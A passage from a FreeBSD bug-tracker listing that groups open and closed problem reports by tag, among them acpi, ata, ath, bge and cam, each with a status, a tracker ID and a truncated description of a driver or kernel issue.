with Intel SS4200: System does not f i386/132535 gavin [acpi] if ACPI enabled, i can't change brightness leve o kern/130683 acpi [ACPI] shutdown hangs after syncing disks - ACPI race? o i386/129953 acpi [acpi] ACPI timeout (CDROM) with Shuttle X27D o kern/129618 acpi [acpi] Problem with ACPI on HP Pavilion DV2899 laptop o kern/129563 acpi [acpi] sleep broken on IBM/Lenovo T61 in amd64 mode o i386/126162 i386 [acpi] ACPI autoload failed : loading required module o kern/124744 acpi [acpi] [patch] incorrect _BST result validation for To o kern/124412 acpi [acpi] power off error on Toshiba M40 laptop f kern/123742 [acpi] [panic] kernel panic when boot with acpi disabl o kern/123039 acpi [acpi] ACPI AML_BUFFER_LIMIT errors during boot o kern/120515 acpi [acpi] [patch] acpi_alloc_wakeup_handler: can't alloc o kern/119356 acpi [acpi]: i386 ACPI wakeup not work due resource exhaust o kern/119200 acpi [acpi] Lid close switch suspends CPU for 1 second on H o kern/118973 acpi [acpi]: Kernel panic with acpi boot o kern/117605 acpi [acpi] [request] add debug.cpufreq.highest o amd64/117316 amd64 [acpi] ACPI lockups on SuperMicro motherboard o kern/116939 acpi [acpi] PCI-to-PCI misconfigured for bus three and can o i386/114562 acpi [acpi] cardbus is dead after s3 on Thinkpad T43 with a o kern/114165 acpi [acpi] Dell C810 - ACPI problem s kern/112544 acpi [acpi] [patch] Add High Precision Event Timer Driver f o kern/108954 acpi [acpi] 'sleep(1)' sleeps >1 seconds when speedstep (Cx o kern/108695 acpi [acpi]: Fatal trap 9: general protection fault when in o kern/108488 acpi [acpi] ACPI-1304: *** Error: Method execution failed o kern/108017 acpi [acpi]: Acer Aspire 5600 o kern/106924 acpi [acpi] ACPI resume returns g_vfs_done() errors and ker o kern/105537 acpi [acpi] problems in acpi on HP Compaq nc6320 o kern/102783 [acpi] hw.acpi has thermal controls backwards when ext s kern/91038 acpi [panic] [ata] [acpi] 6.0-RELEASE on Fujitsu Siemens Am f kern/89411 acpi [acpi] acpiconf bug 31 problems total. Problem reports for tag 'acpi_fujitsu': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/121102 acpi [acpi_fujitsu] [patch] update acpi_fujitsu for the P80 1 problem total. Problem reports for tag 'acpica': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/135891 vwe [acpica] bug in acpica/psparse.c 1 problem total. Problem reports for tag 'adw': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/22417 gibbs [adw] [patch] advansys wide scsi driver does not suppo 1 problem total. Problem reports for tag 'ae': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133239 [ae] [jme] [patch] if_jme can assign duplicate MAC add 1 problem total. Problem reports for tag 'agp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/126784 [agp] agp.ko doesn't detect Acer Aspire One onboard gr o kern/118962 [agp] Intel GMA 3000 Video Controller Not Recognized U o kern/103733 [agp] i915 driver on hp dc7100: device not recognized s kern/89271 [radeon] [agp] [hang] X.org hangs when heavily using R o kern/72224 [agp] umass devices broken by DRM (AGP issue?) o kern/57631 jhb [agp] [patch] boot failing for ALi chipsets 6 problems total. Problem reports for tag 'aha': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/83765 [aha] Adaptec 1542-CP requires plug-and-play switch se 1 problem total. Problem reports for tag 'ahc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/123674 scsi [ahc] ahc driver dumping o kern/99954 scsi [ahc] reading from DVD failes on 6.x [regression] o kern/92798 scsi [ahc] SCSI problem with timeouts o kern/74627 scsi [ahc] [hang] Adaptec 2940U2W Can't boot 5.3 s kern/45568 gibbs [ahc] ahc(A19160) pci parity error s kern/9927 gibbs [ahc] the ahc driver doesn't correctly grok switched S 6 problems total. Problem reports for tag 'ahd': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129602 scsi [ahd] ahd(4) gets confused and wedges SCSI bus o amd64/123520 amd64 [ahd] unable to boot from net while using ahd o kern/110847 scsi [ahd] Tyan U320 onboard problem with more than 3 disks s kern/105533 [ahd] adaptec 29320 causes panic with over 4GB o kern/85768 gibbs [ahd] aic79xx driver timeouts with U160 target (free l o kern/76178 scsi [ahd] Problem with ahd and large SCSI Raid system 6 problems total. Problem reports for tag 'aic': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/124202 [aic] [patch] Add Adaptec 39320LPE to list of known de o kern/114489 scottl [aic] [panic] _mtx_lock_sleep: in aic7xxx_osm.h (with o kern/114459 [aic] [panic] FreeBSD-CURRENT crash during boot with A 3 problems total. Problem reports for tag 'altq': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/131753 net [altq] [panic] kernel panic in hfsc_dequeue s kern/94182 [altq] [request] altq support for vlan driver 2 problems total. Problem reports for tag 'amd': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/124667 scsi [amd] [panic] FreeBSD-7 kernel page faults at amd-scsi 1 problem total. Problem reports for tag 'amd64': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/127397 amd64 [amd64] 32bit application on FreeBSD-6.3 amd64 gets SI o amd64/120202 amd64 [amd64] [patch] [panic] kernel panic at start_all_aps, o amd64/119591 amd64 [amd64] [patch] time_t on 64-bit architecture o kern/117607 [amd64] dev.cpu.0.freq not showing up any longer on am s amd64/57250 kmacy [amd64] [patch] Broken PTRACE_GETFPREGS and PTRACE_SET 5 problems total. Problem reports for tag 'amdtemp': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/125383 i386 [amdtemp] [request] please enable amdtemp on i386 1 problem total. Problem reports for tag 'amr': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/114438 [amr] Anomalous performance with multiple arrays and a o kern/113098 [amr] Cannot read from amrd while under heavy load o kern/99529 [amr] DELL PowerEdge 2600 with streamer PowerVault 100 o kern/94139 scottl [amr] [regression] amr broken with LSILogic MegaRAID S o kern/86411 scottl [amr] Very low performance of amr(4) under FreeBSD-6.0 o kern/76848 [amr] amr hangs o kern/72433 [amr] [patch] AMR raid, amrreg.h struct amr_enquery3 a o kern/71771 [amr] Hang during heavy load with amr raid controller 8 problems total. Problem reports for tag 'an': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/128602 net [an] wpa_supplicant(8) crashes with an(4) o kern/126924 net [an] [patch] printf -> device_printf and simplify prob o kern/85886 [an] [patch] an0: timeouts with Cisco 350 minipci s kern/75407 net [an] an(4): no carrier after short time o kern/36170 [an] [patch] an(4) does an_init() even if interface is 5 problems total. Problem reports for tag 'apic': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/131571 gavin [apic] [panic] Running with APIC enabled crashes a Sup o kern/81000 acpi [apic] Via 8235 sound card worked great with FreeBSD 5 2 problems total. Problem reports for tag 'ar': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/126419 [ar] Fails to boot from RAID10 volume under the Intel o kern/125759 [ar] Fatal Trap 12 when ICH9R RAID becomes degraded o kern/125496 [ar] [patch] free memory on ataraid module unload o kern/124064 [ar] [patch] cannot handle >16 serial number with Inte o kern/121899 [ar] [patch] Drive detached from Intel Matrix RAID and o kern/108924 [ar] Panics when Intel MatrixRAID RAID1 is degraded o kern/102211 [ar] [patch] detach raid member and reboot will cause o kern/101926 [ar] 6.1-STABLE crashes under heavy disk I/O and acces o kern/101819 [ar] [patch] ata driver wrongly determines type RAID o o kern/99850 [ar] ataraid hangs in g_waitidle when attaching to nVi o kern/98804 [ar] VIA V-RAID metadata mis-read (MSI K8MMV with the o kern/94393 [ar] PseudoRAID loses track of the master disk o kern/93771 [ar] [panic] atacontrol status ar1 causes panic 13 problems total. Problem reports for tag 'arcmsr': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/107206 [arcmsr] Background fsck causes kernel panic with arcm 1 problem total. Problem reports for tag 'arp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129730 qingli [arp]: respond with wrong ARP. f bin/127719 net [arp] arp: Segmentation fault (core dumped) o kern/125920 net [arp] Kernel Routing Table loses Ethernet Link status o kern/119432 net [arp] route add -host -iface causes arp e p kern/68189 bz [arp] [jail] [patch] arp -a discloses non-jail interfa o conf/23063 net [arp] [patch] for static ARP tables in rc.network 6 problems total. Problem reports for tag 'asr': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/102612 [asr] da0 not detected when sharing bus with ch0 devic o amd64/91405 amd64 [asr] [panic] Kernel panic caused by asr on 6.0-amd64 o kern/88047 [asr] [panic] 6.0-RC1 reboots with SMP and asr o kern/25950 obrien [asr] Bad drives on asr look zero-length and panic on 4 problems total. Problem reports for tag 'ata': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/135690 [panic] [ata] ufs_dirbad: /backuphd: bad dir ino 22259 o kern/135497 [ata] JMicron JMB363 controller does not recognize PAT o kern/135057 [ata] [patch] New VIA SATA controller are not getting o kern/134520 [ata] SAS HD not detected on LSI SAS1078 (Acer Altos R f kern/134398 gavin [ata] problems with udma modes on atapi ixp600 o kern/133872 [ata] SATA300 controlled as SATA150 on ICH7R mobo o kern/133593 [ata] `atacontrol spindown` won't affect disk until so o kern/133122 [ata] TIMEOUT - READ_BIG with pata dvd-drive o amd64/132372 amd64 [ata] No disks found (nVidia nForce MCP55 sata control o kern/132252 [ata] No CD/DVD devices found! o amd64/131906 amd64 [ata] SATA data corruption with Promise PDC20378 (amd6 f kern/131796 [ata] Introducing new USB or eSATA disks results in at o kern/130794 [ata] hw.ata.ata_dma_limit without any effect o kern/130726 [ata] DMA errors accessing multiple SATA channels f amd64/130365 gavin [ata] Elitegroup A780GM-A Chipset:AMD 780G&SB700 IDE c o kern/130171 [ata] UDMA CF cards do not work with FreeBSD a kern/130018 [ata] Marvell 6145 ata controller gets detected as PAT o kern/129784 [ata] [patch] SATA port multiplier disk detect bugs in o amd64/129667 amd64 [ata] Elitegroup A780GM-A IDE controller not recognize o kern/129373 [ata] [panic] Panic in ata-queue, VIA CLE266, 7.1-BETA o amd64/128686 amd64 [ata] can't detect SATA Disk on 8.0-Current with NF550 o kern/128035 [ata] unexpexted detach of external SATA drive f kern/127813 linimon [ata] ata diver dma mode work incorrectly on chip vt82 o kern/127717 [ata] [patch] - support write cache toggling per devic f kern/127517 [ata] sata does not detect SATA-300 disk but instead d p kern/127411 [ata] [panic] ata panics on bad block o kern/127391 [ata] [patch] Intel 6300ESB SATA150 cannot find disk a o kern/127316 [ata] non aligned DMA transfer errors when using growi p kern/127289 [ata] [patch] new pci ids for SiI3132 present on adapt p kern/127250 [ata] Kerneltrap 12 with atacontrol f kern/127119 [ata] incorrect ata device probing o kern/126807 [ata] PATA DVD drive attached to AMD IXP700 chipset no o kern/126242 [ata] Read error from SATA CD/DVD-drives [regression] o kern/126142 [ata] M5281: READ DMA faults, device detaching o kern/125859 [ata] [patch] sata access failure [regression] a kern/125139 philip [patch] [ata] bugs in ATAPI CD tray control o kern/124670 [ata] large file operation on RAID cause many GEOM err o kern/123980 [ata] [patch] Implement ATA UDMA speed limit (hw.ata.a o kern/123887 [ata] PDC20262 does not support 48 bit DMA access p kern/123754 mav [ata] [panic] atacontrol(8): atacontrol reinit causing o kern/122670 [ata] [patch] broken acd_get_progress = ioctl CDRIOCGE f kern/122368 [ata]: Failure to support SATA/PATA drives on 6.3 and o kern/122291 [ata] acd0: timeout waiting to issue command / acd0: e p kern/122045 [ata] [panic] reiniting detached ata channel kills the f kern/121703 [ata] Cannot fdisk/gpt with 1TB SATA disk and 965QM Mo o kern/121686 [ata] bogus CHS to LBA mapping in (at least) ata o i386/121675 i386 [ata] incorrect fallback to udma33 with CF memory inst o sparc/121539 [ata] Interrupt storm booting 7.0-R/sparc64 on ultra5 o kern/121521 [ata] [patch] add VIA CX700M2 chipset to ata driver o kern/121461 [ata] SATA Hard disks are not detected on SiS 180/181 o kern/121396 [ata] 7.0 fails on mcp55 sata controller [regression] o kern/121350 [ata] [panic] initiate_write_inodeblock_ufs2: already o kern/120717 [ata] boot problem when recognizing ata1 o kern/120534 [ata] Troubles in work with SAS controller Adaptec 941 o kern/120507 [ata] Errors while burning CDs using burncd(8) f kern/120296 linimon [ata] Unstable SATA on MB with Nvidia MCP 570 SLI chip o kern/120177 [ata] ATA DMA modes don't work on CF cards o kern/120009 [ata] Burning on FreeBSD is destroying SONY CD-Rs o kern/119894 [ata] Initialization of disc controller fails [regress o kern/119877 [ata] OS Fails to detect hard disks on HP Proliant ML1 o kern/119838 [ata] udma100 enabled althrough improper cable on nVid o kern/119374 thomas [ata] [regression] ATAPI or ATAPICAM bug (regression i f kern/119303 linimon [ata] SATA HDD missing in 7.0-RC1, ok in 7.0-BETA4; at o kern/119140 [ata] [panic] Kernel panic with sata drive and dma pro o kern/118573 [ata] FreeBSD doesnt support my optical drive o kern/118447 [ata] [patch] Troublesome DMA modes with VIA Apollo VP o kern/118342 [ata] Unable to mount root on ata drive w/ Cyrix 5530 s kern/118158 [ata] SONY SDX-570V (ATAPI) hangs frequently o kern/117972 [ata] SATA DLT V4 not recognized properly o kern/117443 [ata] [hang] system hang with ataidle o kern/117421 [ata] [hang] System hang with failing SATA disk (SiI31 o amd64/117296 amd64 [ata] I don`t see second SATA IDE on VIA VT8237A o kern/117215 [ata] Kernel errors accessing audio CDs w/ Samsung SAT o kern/116935 [ata] Intermittent error with Promise PDC40718 o kern/116415 [ata] 6.2-STABLE does not work on Gigabyte GA-P35-S3 ( o kern/116270 [ata] READ_DMA48 UDMA ICRC error s amd64/115815 amd64 [ata] [request] Gigabyte GA-M61P-S3 Motherboard unsupp f kern/115614 thomas [ata] Recent ATA driver changes have broken cdrecord [ o kern/115479 [ata] [request] ASUS P5K SE need more support o kern/115232 [ata] Audio CD tracks not displayed properly by atapi o kern/115152 [ata] Sil 3512 SATA controller panics on 6.2 o kern/114213 [ata] optical drive not detected in the 6.x series of o kern/112282 [ata] atacontrol(8): changing DMA modes when disk is r o i386/112036 i386 [ata] TIMEOUT - WRITE_DMA retrying, TIMEOUT - READ_DMA o kern/111196 [ata] [hang] SATA drives cause errors and cause system p kern/111023 mav [ata] [request] [patch] please expand ata timeouts o kern/110407 [ata] ATA drivers not recognizing Seagate CF Microdriv o kern/109736 [ata] FreeBSD sysinstall from CD can't find & mount NE s i386/109200 i386 [ata] READ_UDMA UDMA ICRC error cause not detecting ca o kern/108379 [ata] Secondary SATA drive not detected by FreeBSD 6.2 o amd64/107639 [ata] Kernel Panic/Crash on dd if=/dev/ad4 of=/dev/ad6 o kern/107622 [ata] can't boot on HP Pavilion dv6000 / problem with f kern/107292 [ata] cannot install - Unable to find device /dev/ad0s f kern/107287 [ata] page fault during install on Intel SATA on Intel o kern/106432 [ata] Record of disks (DVD-R) through the k3b program s kern/106340 [ata] [request] Need to control disk write cache on pe f amd64/105531 amd64 [ata] gigabyte GA-M51GM-S2G / nVidia nForce 430 - does o usb/105065 usb [ata] [usb] SATA - USB Bridge s kern/104950 [ata] [request] no support for SATA controller Initio p kern/104818 [ata] Missing driver Silicon Image SiI 3132 SATA II PC o kern/104799 [ata] Several ata observations ICH8 BIOS o i386/104719 i386 [ata] Seagate ST3802110A errors/delays when using PIO4 f i386/104572 i386 [ata] issues with detecting HDD on Intel Q965 Express o kern/103883 [ata] DMA is not defaulted on WDMA device (SIS integra s i386/103624 i386 [ata] [install] Problem installing on Dell Powervault p kern/103075 [ata] SATA disk attach/unplug from a MV88SX5041 freeze o kern/101734 [ata] -CURRENT cannot see SATA drive on ASUS A8N-SLI ( o kern/99652 [ata] nVidia nForce MCP51 controller hangs w/ 2 drives o kern/99567 [ata] Powerup of sleeping IDE drives causes system reb o kern/99088 [ata] Critical Problems with VIA 8251 SATA2/RAID Contr o kern/99017 [ata] [patch] FreeBSD versions above 5.3 panic if atap o kern/98962 remko [ata] [burncd]: [patch] writing >1 session on ATAPI CD o i386/98765 i386 [ata] timeouts on sata drive (Asus a7n8x-e) o kern/98388 [ata] FreeBSD 6.1 - WDC WD1200JS SATA II disks are see o kern/97996 [ata] DMA is broken for VIA 82C596B UDMA66controller o i386/97263 i386 [ata] FreeBSD only detects first drive on PDC20378 378 f i386/96302 gavin [ata] nVidia nForce CK804 SATA300 controller not recog o kern/96171 [ata] burncd (ATA driver) fails to write in vcd mode o amd64/95888 amd64 [ata] kernel: ad2: TIMEOUT - WRITE_DMA retrying on HP f i386/94911 gavin [ata] [regression] ata regression with DOM-IDE o kern/94155 [ata] 6.1 CF reader problem: "ad1: FAILURE - SETFEATUR f i386/93923 i386 [ata] FreeBSD Install, Sil3112: Cannot dump. No dump d o kern/93885 [ata] ata(4) failure: SETFEATURES SET TRANSFER MODE se o kern/92786 [ata] [patch] ATA fixes, write support for LSI v3 RAID o kern/92238 [ata] [patch] Spurious "atapci1: failed to enable memo s kern/91290 [ata] ata(4) error on 7.0-CURRENT-20051229-SNAP-PC98 s kern/91038 acpi [panic] [ata] [acpi] 6.0-RELEASE on Fujitsu Siemens Am o kern/90206 [ata] [reboot] Server reboot after "FAILURE - out of m f i386/88929 i386 [ata] FreeBSD 6.0 install CD fails to find disks on So o kern/85450 [ata] [panic] subdisk6 detached (appears to be a sata o kern/79783 [ata] hw.ata.atapi_dma=1 reduces HDD writing transfer o kern/78758 [ata] [patch] Add support for re-sizing ATA disks f kern/73740 [ata] [panic] 5-3-R#3 panic when accessing nfs exporte f kern/61960 linimon [ata] [patch] BigDrive support for PC-98 architecture o kern/36911 [ata] ATA cannot be disabled with hints or through BIO 135 problems total. Problem reports for tag 'atapicam': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/120787 [atapicam] hardware troubles with atapicam and dvd f kern/118161 thomas [atapicam] failure message from ATAPI CDROM in the boo o kern/117028 [atapicam] [panic] brelse: free buffer onto another qu o kern/116701 [atapicam] atapicam hangs initializing SATA DVDRs on s o kern/108202 [atapicam] atapicam error after upgrade to 6.2 [regres o kern/106490 [atapicam] atapicam fails with ATAPI-CD/DVD drives att o kern/100516 [atapicam] atapicam with ITE IT8212F crashes the syste o i386/99608 i386 [atapicam] ATAPI or CAM crash on FreeBSD 6.1-stable wi o kern/95407 [atapicam] atapicam, cd and /etc/rc.d/devfs problem o kern/91572 [atapicam] [panic] writing to UFS/softupdates DVD medi o kern/80714 [atapicam] drop/boot to single user hangs on 5.4-RELEA a kern/78929 [atapicam] atapicam prevents boot, system hangs o kern/63629 thomas [atapicam] mounting atapicam volume through cd0c cause o kern/60699 [atapicam] DVD Multidrive udma mode autosensed wrong 14 problems total. Problem reports for tag 'ataraid': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134887 [ataraid] source consistency problem o kern/134054 [ataraid] [panic] traps kernel on boot if Intel Matrix o i386/89249 [ataraid] HighPoint RocketRAID 1520 (HPT372N) can't wr 3 problems total. Problem reports for tag 'ate': S Tracker Resp. Description -------------------------------------------------------------------------------- o arm/121242 ticso [ate] [patch] Promiscuous mode of if_ate (arm) doesn't 1 problem total. Problem reports for tag 'ath': S Tracker Resp. Description -------------------------------------------------------------------------------- f i386/135427 vwe [ath] [hang] System freezes when loading Atheros drive o kern/132722 net [ath] Wifi ath0 associates fine with AP, but DHCP or I o kern/131162 net [ath] Atheros driver bugginess and kernel crashes o kern/129750 net [ath] Atheros AR5006 exits on "cannot map register spa o kern/126475 net [ath] [panic] ath pcmcia card inevitably panics under o kern/126214 net [ath] txpower problem with Atheros wifi card o kern/125721 [ath] Terrible throughput/high ping latency with Ubiqu o kern/125617 [ath] ath(4) related panic o kern/125501 [ath] atheros cardbus driver hangs o kern/125332 [ath] [hang] crash under any non-tiny networking under o kern/122697 net [ath] Atheros card is not well supported f kern/121394 sam [ath] FreeBSD access point (ath0) fails 100% of the ti o kern/121061 sam [ath] [panic] panic while ejecting ath(4)-adapter duri o kern/120376 imp [ath] High interrupt load when booting with ath (PCMCI o kern/120282 imp [ath] [panic] resource_list_release: resource entry is f kern/119345 vwe [ath] Unsuported Atheros 5424/2424 and CPU speedstep n s kern/117513 vwe [panic] [ath] Fatal trap 12: page fault while in kerne s kern/116444 vwe [ath] Atheros 5005G (AR5212) miniPCI: unable to attach f kern/115226 vwe [ath] ath0: unable to attach hardware; HAL status 13 o kern/107279 [ath] panic: ath_start: attempted use of a free mbuf! o kern/105348 net [ath] ath device stopps TX f sparc/94483 sam [ath] ath_hal does not work on 6-release/sparc64 o kern/93886 net [ath] Atheros/D-Link DWL-G650 long delay to associate f kern/88082 net [ath] [panic] cts protection for ath0 causes panic 24 problems total. Problem reports for tag 'aue': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/131576 usb [aue] ADMtek USB To LAN Converter can't send data o kern/91311 net [aue] aue interface hanging o usb/71280 usb [aue] aue0 device (linksys usb100tx) doesn't work in 1 o kern/61300 [aue] [patch] Enabling HomePNA PHY on aue(4) for HomeP o kern/51009 [aue] [patch] buggy aue driver fixed. 5 problems total. Problem reports for tag 'axe': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/119981 usb [axe] [patch] add support for LOGITEC LAN-GTJ/U2 gigab o usb/106621 usb [axe] [patch] DLINK DUB-E100 support broken o usb/88408 usb [axe] axe0 read PHY failed 3 problems total. Problem reports for tag 'bce': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135836 net [bce] bce BCM5709 Watchdog after warm boot - ok after f kern/134788 delphij [bce] failure to set ip address in amd64 if_bce.c, i38 o kern/134658 net [bce] bce driver fails on PowerEdge m610 blade. o amd64/131209 amd64 [panic] [bce] 7.1-STABLE amd64 crash - m0 NULL o kern/125389 [ipmi] [bce] IPMI problem with bce f kern/123172 net [bce] Watchdog timeout problems with if_bce a kern/118238 net [bce] [patch] bce driver shows "no carrier" on Intel S o kern/108542 net [bce] Huge network latencies with 6.2-RELEASE / STABLE o kern/107850 net [bce] bce driver link negotiation is faulty o kern/100858 davidch [bce] Broadcom bce driver and SMP hangup 10 problems total. Problem reports for tag 'bfe': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/104349 i386 [bfe] Panic while uploading data via bfe network inter p kern/98015 remko [bfe] [patch] bfe(4): double free in error handling pa o kern/96030 net [bfe] [patch] Install hangs with Broadcomm 440x NIC in 3 problems total. Problem reports for tag 'bge': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133328 net [bge] [panic] Kernel panics with Windows7 client o kern/132991 net [bge] if_bge low performance problem s kern/127587 net [bge] [request] if_bge(4) doesn't support BCM576X fami o kern/123347 net [bge] bge1: watchdog timeout -- linkstate changed to D o kern/122551 net [bge] Broadcom 5715S no carrier on HP BL460c blade usi f kern/122252 net [ipmi] [bge] IPMI problem with BCM5704 (does not work o kern/121080 net [bge] IPv6 NUD problem on multi address config on bge0 o kern/120791 [bge] The Broadcom BCM5703 A2 NIC is running a lot of a kern/118879 net [bge] [patch] bge has checksum problems on the 5703 ch o kern/116328 net [bge]: Solid hang with bge interface o kern/112570 net [bge] packet loss with bge driver on BCM5704 chipset o kern/109733 net [bge] bge link state issues [regression] o kern/104862 [bge] BCM5704 only works at 10Mbit o kern/104826 andre [bge] FreeBSD 6.1 not RFC 768 (UDP) compliant on Compa o kern/104485 net [bge] Broadcom BCM5704C: Intermittent on newer chip ve o kern/103715 [bge] [request] Broadcom BCM5708SKFB not recognised by o kern/100410 [bge] bge driver disables access to shared iLo on HP D o i386/96382 i386 [bge] In 6.1-RC1 the bge driver does not reliably work s kern/94863 net [bge] [patch] hack to get bge(4) working on IBM e326m o kern/94424 [bge] BGE5721 or BGE5750? o kern/94162 net [bge] 6.x kenel stale with bge(4) o kern/92090 net [bge] bge0: watchdog timeout -- resetting f kern/73538 net [bge] problem with the Broadcom BCM5788 Gigabit Ethern f i386/45773 net [bge] Softboot causes autoconf failure on Broadcom 570 24 problems total. Problem reports for tag 'bktr': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127131 multimedia [bktr] /usr/src/sys/dev/bktr/bktr_os.c, line 469: wron o kern/120884 [bktr] [patch] bktr driver always stores the contigmal o kern/108133 jmg [bktr] [patch] bktr driver doesn't recognize Hauppauge o kern/105604 [bktr] [patch] add support for Pixelview PlayTV Pro 2 o kern/104675 [bktr] METEORSINPUT seemingly not setting input o kern/102549 [bktr] [patch] fix Pixelview PlayTV Pro 2 on bktr o kern/94369 itetcu [bktr] [patch] Patch to support Leadtek WinFast Tv2000 o kern/89553 [bktr] [patch] going from 5.3 -> 6.0 winTV card not pr o kern/81180 [bktr] bktr(4) driver cannot capture both audio and vi o kern/79066 [bktr] bktr(4) eating about 10% CPU load once it was u s kern/60599 multimedia [bktr] [partial patch] No sound for ATI TV Wonder (ste o kern/59289 [bktr] [patch] ioctl METEORGBRIG in bktr_core.c forget o kern/57603 [bktr] bktr driver: freeze on SMP machine o kern/56245 [bktr] Distorted and choppy video with bktr-driver on s kern/48279 [bktr] Brooktre878 may cause freeze o kern/37326 [bktr] smbus/bktr crash when omitting "device iicsmb" a kern/36451 [bktr] [patch] Japan IF frequency is incorrect o kern/36415 [bktr] [patch] driver incorrectly handles the setting o kern/35289 [bktr] [patch] Brooktree device doesnt properly signal o kern/32812 [bktr] bktr driver missing tuner for eeprom detection. 20 problems total. Problem reports for tag 'bluetooth': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128598 net [bluetooth] WARNING: attempt to net_add_domain(bluetoo o kern/99200 usb [bluetooth] SMP-Kernel crashes reliably when Bluetooth 2 problems total. Problem reports for tag 'boot0': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/134242 i386 [boot0] [patch] improvement i386 boot0 error diagnose o i386/70531 i386 [boot0] [patch] boot0 hides Lilo in extended slice 2 problems total. Problem reports for tag 'boot0cfg': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/127764 [boot0cfg] [patch] preserve NT disk UID data for boot0 1 problem total. Problem reports for tag 'boot1': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/91871 i386 [boot1] [patch] boot1: jump to 0xf000:0xfff0 instead o 1 problem total. Problem reports for tag 'boot2': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/35262 [boot2] [patch] generation of boot block for headless 1 problem total. Problem reports for tag 'bootinst': S Tracker Resp. Description -------------------------------------------------------------------------------- o misc/22914 [bootinst] bootinst messages are not updated 1 problem total. Problem reports for tag 'bpf': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133490 net [bpf] [panic] 'kmem_map too small' panic on Dell r900 f kern/89752 dwmalone [bpf] [patch] bpf_validate() needs to do more checks o kern/16644 dwmalone [bpf] [patch] Bad comparison expression in bpf_filter. 3 problems total. Problem reports for tag 'bsd.apache.mk': S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/133197 pgollucci [bsd.apache.mk] Rephrase IGNORE statement, kill EOL sp 1 problem total. Problem reports for tag 'bsd.cpu.mk': S Tracker Resp. Description -------------------------------------------------------------------------------- o conf/30399 brueffer [bsd.cpu.mk] [patch] Have Fortran use the CPUTYPE vari 1 problem total. Problem reports for tag 'bsd.fpc.mk': S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/133254 [bsd.fpc.mk] don't display bogus message for fpc-using 1 problem total. Problem reports for tag 'bsd.port.mk': S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/135221 portmgr [bsd.port.mk] unified support for LINUX_OSRELEASE depe 1 problem total. Problem reports for tag 'bsd.python.mk': S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/133081 python [bsd.python.mk] PYEASYINSTALL_ARCHDEP=yes makes broken 1 problem total. Problem reports for tag 'busdma': S Tracker Resp. Description -------------------------------------------------------------------------------- p amd64/133592 kib [busdma] [patch] busdma incorrectly calculates bounce o i386/119175 i386 [busdma] [patch] Typo in bus_dmamem_alloc() o amd64/93961 amd64 [busdma] Problem in bounce buffer handling in sys/amd6 o i386/76944 i386 [busdma] [patch] i386 bus_dmamap_create() bug 4 problems total. Problem reports for tag 'cam': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/130735 scsi [cam] [patch] pass M_NOWAIT to the malloc() call insid o usb/121474 usb [cam] [patch] QUIRK: SAMSUNG HM250JI in LaCie usb hard o kern/120858 scottl [patch] [cam] panic: ufs_dirbad with CLARiiON CX3-40 o kern/119668 scsi [cam] [patch] certain errors are too verbose comparing o usb/119653 usb [cam] [patch] iriver s7 player sync cache error patch o usb/119201 usb [cam] [patch] Quirks for Olympus FE-210 camera, LG and o usb/107243 usb [cam] [patch] Apacer USB Flash Drive quirk o usb/97472 usb [cam] [patch] add support for Olympus C150,D390 o usb/96381 usb [cam] [patch] add a quirk table entry for a flash ram o usb/93872 usb [cam] [patch] SCSI quirk required for ELTA 8061 OL USB s kern/85975 [cam] devfs does not create entries when removable med o kern/76893 [cam] [patch] Fatal divide in booting processes with B s kern/72041 [cam] [hang] Deadlock when disk is destroyed while use s bin/57088 [cam] [patch] for a possible fd leak in libcam.c s kern/28840 gibbs [cam] Possible interrupt masking trouble in sys/cam/ca s i386/17662 gibbs [cam] cam_xpt.c incorrectly disables tagged queuing fo o kern/17504 [cam] [patch] Another Micropolis Synchronize Cache Pro 17 problems total. Problem reports for tag 'cardbus': S Tracker Resp. Description -------------------------------------------------------------------------------- f i386/125880 i386 [cardbus] Cardbus cards Don't function on TI PCIxx12 C o kern/122749 [cardbus] cardbus problem on IBM Thinkpad T60P o kern/121761 [cardbus] [dc] a cardbus dc0 causes a system freeze wh o kern/121760 [pccard] [cardbus] an ed1 network pccard's CIS wasn't o kern/121759 [cardbus] [dc] cardbus dc0 initialization failure at o a kern/115623 imp [cardbus] [patch] Xircom CardBus Ethernet II 10/100 Ad o kern/115371 imp [cardbus] [patch] Device removal leaves resource datab o kern/84954 imp [CARDBUS] cbb alloc res fail (with hw.cardbus.debug=1 8 problems total. Problem reports for tag 'carp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133218 net [carp] [hang] use of carp(4) causes system to freeze 